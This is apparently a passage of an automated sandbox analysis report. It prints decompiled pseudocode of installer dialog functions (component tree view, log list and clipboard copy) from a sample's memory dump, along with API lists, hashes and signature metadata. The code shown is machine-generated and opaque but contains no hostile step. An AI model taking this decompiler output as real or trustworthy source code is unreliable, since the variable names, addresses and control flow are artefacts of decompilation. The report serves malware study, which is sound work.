										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404753(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423f58; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420514;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42052c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420514 = _t315;
									 *0x42052c = _t315;
									 *0x423fa0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423f59 & 0x00000001;
										if(( *0x423f59 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423f6c - _t315; // 0x1
										_v32 =  *0x42052c;
										_t196 =  *0x423f68; // 0x520ec4
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42371c; // 0x526e38
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040470E(0x3ff, 0xfffffffb, E00404726(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x520ecc
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x520edc
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423f6c; // 0x1
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42052c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423fa0 = _a4;
					_t247 =  *0x423f6c; // 0x1
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42052c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f40, 0x6e);
					 *0x420520 =  *0x420520 | 0xffffffff;
					_v24 = _t250;
					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420514 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E54(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E54(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423f6c - _t318; // 0x1
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42052c + _t318 * 4) = _t274;
									_t288 =  *( *0x42052c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423f6c; // 0x1
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E89(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E89(_v12);
								L89:
								return E00403EBB(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                  0x004047f1
                                                  0x004047f7
                                                  0x004047f9
                                                  0x004047ff
                                                  0x00404805
                                                  0x00404808
                                                  0x00404812
                                                  0x0040481b
                                                  0x0040481e
                                                  0x00404821
                                                  0x00404a49
                                                  0x00404a49
                                                  0x00404a50
                                                  0x00404a64
                                                  0x00404a52
                                                  0x00404a54
                                                  0x00404a57
                                                  0x00404a58
                                                  0x00404a5f
                                                  0x00404a5f
                                                  0x00404a67
                                                  0x00404a70
                                                  0x00404a7b
                                                  0x00404a7b
                                                  0x00404a7e
                                                  0x00404a81
                                                  0x00404a90
                                                  0x00404a90
                                                  0x00404a97
                                                  0x00404b0f
                                                  0x00404b0f
                                                  0x00404b12
                                                  0x00404b14
                                                  0x00404b17
                                                  0x00404b1e
                                                  0x00404b2c
                                                  0x00404b2c
                                                  0x00404b2e
                                                  0x00404b31
                                                  0x00404b38
                                                  0x00404b3a
                                                  0x00404b3e
                                                  0x00404b5b
                                                  0x00404b5f
                                                  0x00404b5f
                                                  0x00404b40
                                                  0x00404b4d
                                                  0x00404b4d
                                                  0x00404b3e
                                                  0x00404b38
                                                  0x00000000
                                                  0x00404b12
                                                  0x00404a99
                                                  0x00404a9c
                                                  0x00404aa7
                                                  0x00404aa9
                                                  0x00404aac
                                                  0x00404ab3
                                                  0x00404ab8
                                                  0x00404aba
                                                  0x00404ac4
                                                  0x00404ac4
                                                  0x00404ac8
                                                  0x00404aca
                                                  0x00404acd
                                                  0x00404acf
                                                  0x00404ad2
                                                  0x00404ae8
                                                  0x00404ae8
                                                  0x00404ad4
                                                  0x00404ad4
                                                  0x00404ada
                                                  0x00404adc
                                                  0x00404ae3
                                                  0x00404ade
                                                  0x00404ade
                                                  0x00404ade
                                                  0x00404adc
                                                  0x00404aec
                                                  0x00404aee
                                                  0x00404af3
                                                  0x00404afc
                                                  0x00404afd
                                                  0x00404b07
                                                  0x00404b07
                                                  0x00404b09
                                                  0x00404b0c
                                                  0x00404b0c
                                                  0x00404acd
                                                  0x00000000
                                                  0x00404aba
                                                  0x00404a9e
                                                  0x00404aa1
                                                  0x00404aa5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404aa5
                                                  0x00404a83
                                                  0x00404a8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404a72
                                                  0x00404a72
                                                  0x00404a75
                                                  0x00404b62
                                                  0x00404b62
                                                  0x00404b69
                                                  0x00404bdd
                                                  0x00404bdd
                                                  0x00404be4
                                                  0x00404bf0
                                                  0x00404bf0
                                                  0x00404bf2
                                                  0x00404bf9
                                                  0x00404bfb
                                                  0x00404c00
                                                  0x00404c02
                                                  0x00404c05
                                                  0x00404c05
                                                  0x00404c0b
                                                  0x00404c10
                                                  0x00404c12
                                                  0x00404c15
                                                  0x00404c15
                                                  0x00404c1b
                                                  0x00404c21
                                                  0x00404c27
                                                  0x00404c27
                                                  0x00404c2d
                                                  0x00404c34
                                                  0x00404d81
                                                  0x00404d81
                                                  0x00404d88
                                                  0x00404d8a
                                                  0x00404d91
                                                  0x00404d95
                                                  0x00404da2
                                                  0x00404da2
                                                  0x00404da5
                                                  0x00404dab
                                                  0x00404dbd
                                                  0x00404dbd
                                                  0x00404d91
                                                  0x00000000
                                                  0x00404c3a
                                                  0x00404c3c
                                                  0x00404c41
                                                  0x00404c44
                                                  0x00404c48
                                                  0x00404c48
                                                  0x00404c4d
                                                  0x00404c50
                                                  0x00404c91
                                                  0x00404c93
                                                  0x00404c9d
                                                  0x00404ca3
                                                  0x00404ca6
                                                  0x00404cab
                                                  0x00404cb2
                                                  0x00404cb5
                                                  0x00404d57
                                                  0x00404d5d
                                                  0x00404d63
                                                  0x00404d68
                                                  0x00404d6b
                                                  0x00404d7c
                                                  0x00404d7c
                                                  0x00000000
                                                  0x00404cbb
                                                  0x00404cbb
                                                  0x00404cbb
                                                  0x00404cbe
                                                  0x00404cc4
                                                  0x00404cc7
                                                  0x00404cc9
                                                  0x00404ccb
                                                  0x00404ccd
                                                  0x00404cd0
                                                  0x00404cd3
                                                  0x00404cda
                                                  0x00404cdc
                                                  0x00404cdf
                                                  0x00404ce6
                                                  0x00404ce9
                                                  0x00404ce9
                                                  0x00404ce9
                                                  0x00404ce9
                                                  0x00404ced
                                                  0x00404cf0
                                                  0x00404cfc
                                                  0x00404cfd
                                                  0x00404d00
                                                  0x00404d02
                                                  0x00404d02
                                                  0x00404d02
                                                  0x00404cf2
                                                  0x00404cf4
                                                  0x00404cf4
                                                  0x00404d21
                                                  0x00404d21
                                                  0x00404d22
                                                  0x00404d2e
                                                  0x00404d3d
                                                  0x00404d3d
                                                  0x00404d3f
                                                  0x00404d42
                                                  0x00404d4b
                                                  0x00404d4b
                                                  0x00000000
                                                  0x00404cbe
                                                  0x00404c52
                                                  0x00404c5d
                                                  0x00404c60
                                                  0x00404c65
                                                  0x00404c67
                                                  0x00404c69
                                                  0x00404c6b
                                                  0x00404c7b
                                                  0x00404c85
                                                  0x00404c87
                                                  0x00404c8a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404c6d
                                                  0x00404c6d
                                                  0x00404c6d
                                                  0x00404c70
                                                  0x00404c73
                                                  0x00404c75
                                                  0x00404c75
                                                  0x00404c75
                                                  0x00404c76
                                                  0x00404c77
                                                  0x00404c77
                                                  0x00000000
                                                  0x00404c6d
                                                  0x00404c50
                                                  0x00404c34
                                                  0x00404b6b
                                                  0x00404b71
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b7d
                                                  0x00404b81
                                                  0x00000000
                                                  0x00000000
                                                  0x00404b91
                                                  0x00404b93
                                                  0x00404b96
                                                  0x00000000
                                                  0x00000000
                                                  0x00404ba8
                                                  0x00404baa
                                                  0x00404bad
                                                  0x00404bb7
                                                  0x00404bb9
                                                  0x00404bba
                                                  0x00404bbb
                                                  0x00404bca
                                                  0x00404bcc
                                                  0x00404bd3
                                                  0x00404bd6
                                                  0x00000000
                                                  0x00404bd6
                                                  0x00404baf
                                                  0x00404bb2
                                                  0x00404bb5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00404bb5
                                                  0x00000000
                                                  0x00404a75
                                                  0x00404827
                                                  0x0040482c
                                                  0x00404831
                                                  0x00404836
                                                  0x00404837
                                                  0x00404840
                                                  0x0040484b
                                                  0x00404856
                                                  0x0040485c
                                                  0x0040486a
                                                  0x0040487f
                                                  0x00404884
                                                  0x0040488f
                                                  0x00404898
                                                  0x004048ad
                                                  0x004048be
                                                  0x004048cb
                                                  0x004048cb
                                                  0x004048d0
                                                  0x004048d6
                                                  0x004048d8
                                                  0x004048db
                                                  0x004048e0
                                                  0x004048e5
                                                  0x004048e7
                                                  0x004048e7
                                                  0x00404907
                                                  0x00404907
                                                  0x00404909
                                                  0x0040490a
                                                  0x0040490f
                                                  0x00404912
                                                  0x00404915
                                                  0x00404919
                                                  0x0040491e
                                                  0x00404923
                                                  0x00404927
                                                  0x0040492c
                                                  0x00404931
                                                  0x00404933
                                                  0x00404935
                                                  0x0040493b
                                                  0x00404a05
                                                  0x00404a18
                                                  0x00000000
                                                  0x00404941
                                                  0x00404944
                                                  0x00404947
                                                  0x0040494a
                                                  0x0040494a
                                                  0x00404950
                                                  0x00404956
                                                  0x00404959
                                                  0x0040495f
                                                  0x00404960
                                                  0x00404965
                                                  0x0040496e
                                                  0x00404975
                                                  0x00404978
                                                  0x0040497b
                                                  0x0040497e
                                                  0x004049b8
                                                  0x004049ba
                                                  0x004049e3
                                                  0x004049bc
                                                  0x004049c9
                                                  0x004049c9
                                                  0x00404980
                                                  0x00404983
                                                  0x00404992
                                                  0x0040499c
                                                  0x004049a4
                                                  0x004049ab
                                                  0x004049b3
                                                  0x004049b3
                                                  0x0040497e
                                                  0x004049e9
                                                  0x004049ea
                                                  0x004049f0
                                                  0x004049f6
                                                  0x004049f6
                                                  0x00404a03
                                                  0x00404a1e
                                                  0x00404a22
                                                  0x00404a3f
                                                  0x00404a44
                                                  0x00404a47
                                                  0x00404a47
                                                  0x00000000
                                                  0x00404a24
                                                  0x00404a29
                                                  0x00404a32
                                                  0x00404dbf
                                                  0x00404dd1
                                                  0x00404dd1
                                                  0x00404a22
                                                  0x00000000
                                                  0x00404a03
                                                  0x0040493b

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $8nR$M$N
                                                  • API String ID: 1638840714-3321579742
                                                  • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                  • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                                  • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                                  • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00404FC2, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 96%
                                                  			E00404FC2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423724; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F56, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x420538;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42370c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x423f48, 8);
							__eflags =  *0x423fcc - _t149; // 0x0
							if(__eflags == 0) {
								E00404E84( *((intOrPtr*)( *0x41fd08 + 0x34)), _t149);
							}
							E00403E2D(1);
							goto L25;
						}
						 *0x41f900 = 2;
						E00403E2D(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EBB(_a8, _a12, _a16);
						}
						ShowWindow( *0x423710, _t149);
						ShowWindow(_t154, 8);
						E00403E89(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423f50; // 0x520d18
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423710 = GetDlgItem(_a4, 0x403);
				 *0x423708 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423724 = _t127;
				_v8 = _t127;
				E00403E89( *0x423710);
				 *0x423714 = E00404726(4);
				 *0x42372c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E54(_a4);
				if(( *0x423f58 & 0x00000003) != 0) {
					ShowWindow( *0x423710, _t149);
					if(( *0x423f58 & 0x00000002) != 0) {
						 *0x423710 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E89( *0x423708);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423f58 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                  0x00404fcb
                                                  0x00404fd1
                                                  0x00404fda
                                                  0x00404fdd
                                                  0x0040516e
                                                  0x00405175
                                                  0x00405199
                                                  0x00405199
                                                  0x0040519f
                                                  0x004051ac
                                                  0x004051ca
                                                  0x004051ca
                                                  0x004051d1
                                                  0x00405228
                                                  0x00405228
                                                  0x0040522c
                                                  0x00000000
                                                  0x00000000
                                                  0x0040522e
                                                  0x00405231
                                                  0x00000000
                                                  0x00000000
                                                  0x0040523b
                                                  0x00405241
                                                  0x00405243
                                                  0x00405246
                                                  0x0040533f
                                                  0x00000000
                                                  0x0040533f
                                                  0x00405255
                                                  0x00405261
                                                  0x00405267
                                                  0x0040526a
                                                  0x0040526d
                                                  0x00405282
                                                  0x00405285
                                                  0x00405285
                                                  0x00405288
                                                  0x0040526f
                                                  0x00405274
                                                  0x0040527a
                                                  0x0040527d
                                                  0x0040527d
                                                  0x00405298
                                                  0x004052a0
                                                  0x004052a1
                                                  0x004052a3
                                                  0x004052ac
                                                  0x004052af
                                                  0x004052b6
                                                  0x004052bd
                                                  0x004052c5
                                                  0x004052c5
                                                  0x004052d3
                                                  0x004052d9
                                                  0x004052dc
                                                  0x004052dc
                                                  0x004052e3
                                                  0x004052e9
                                                  0x004052f2
                                                  0x004052f9
                                                  0x00405302
                                                  0x00405304
                                                  0x00405307
                                                  0x00405316
                                                  0x00405318
                                                  0x0040531e
                                                  0x0040531f
                                                  0x00405320
                                                  0x00405320
                                                  0x00405328
                                                  0x00405333
                                                  0x00405339
                                                  0x00405339
                                                  0x00000000
                                                  0x004052a3
                                                  0x004051d3
                                                  0x004051d9
                                                  0x00405209
                                                  0x0040520b
                                                  0x00405211
                                                  0x0040521c
                                                  0x0040521c
                                                  0x00405223
                                                  0x00000000
                                                  0x00405223
                                                  0x004051dd
                                                  0x004051e7
                                                  0x00000000
                                                  0x004051ae
                                                  0x004051ae
                                                  0x004051b4
                                                  0x004051ec
                                                  0x00000000
                                                  0x004051f5
                                                  0x004051bd
                                                  0x004051c2
                                                  0x004051c5
                                                  0x00000000
                                                  0x004051c5
                                                  0x004051ac
                                                  0x00404fe3
                                                  0x00404fe7
                                                  0x00404ff0
                                                  0x00404ff7
                                                  0x00404ffa
                                                  0x00404ffd
                                                  0x00405000
                                                  0x00405001
                                                  0x00405002
                                                  0x0040501b
                                                  0x0040501e
                                                  0x00405028
                                                  0x00405037
                                                  0x0040503f
                                                  0x00405047
                                                  0x0040504c
                                                  0x0040504f
                                                  0x0040505b
                                                  0x00405064
                                                  0x0040506d
                                                  0x00405090
                                                  0x00405096
                                                  0x004050a7
                                                  0x004050ac
                                                  0x004050ba
                                                  0x004050c8
                                                  0x004050c8
                                                  0x004050cd
                                                  0x004050db
                                                  0x004050db
                                                  0x004050e0
                                                  0x004050e3
                                                  0x004050e8
                                                  0x004050f4
                                                  0x004050fd
                                                  0x0040510a
                                                  0x00405119
                                                  0x0040510c
                                                  0x00405111
                                                  0x00405111
                                                  0x00405125
                                                  0x00405125
                                                  0x00405139
                                                  0x00405142
                                                  0x0040514b
                                                  0x0040515b
                                                  0x00405167
                                                  0x00405167
                                                  0x00000000

                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 00405021
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                                  • GetClientRect.USER32 ref: 0040506D
                                                  • GetSystemMetrics.USER32 ref: 00405075
                                                  • SendMessageA.USER32 ref: 00405096
                                                  • SendMessageA.USER32 ref: 004050A7
                                                  • SendMessageA.USER32 ref: 004050BA
                                                  • SendMessageA.USER32 ref: 004050C8
                                                  • SendMessageA.USER32 ref: 004050DB
                                                  • ShowWindow.USER32(00000000,?), ref: 004050FD
                                                  • ShowWindow.USER32(?,00000008), ref: 00405111
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                                  • SendMessageA.USER32 ref: 00405142
                                                  • SendMessageA.USER32 ref: 0040515B
                                                  • SendMessageA.USER32 ref: 00405167
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                                    • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405199
                                                  • ShowWindow.USER32(00000000), ref: 004051BD
                                                  • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                                  • ShowWindow.USER32(00000008), ref: 00405209
                                                  • SendMessageA.USER32 ref: 0040523B
                                                  • CreatePopupMenu.USER32 ref: 0040524C
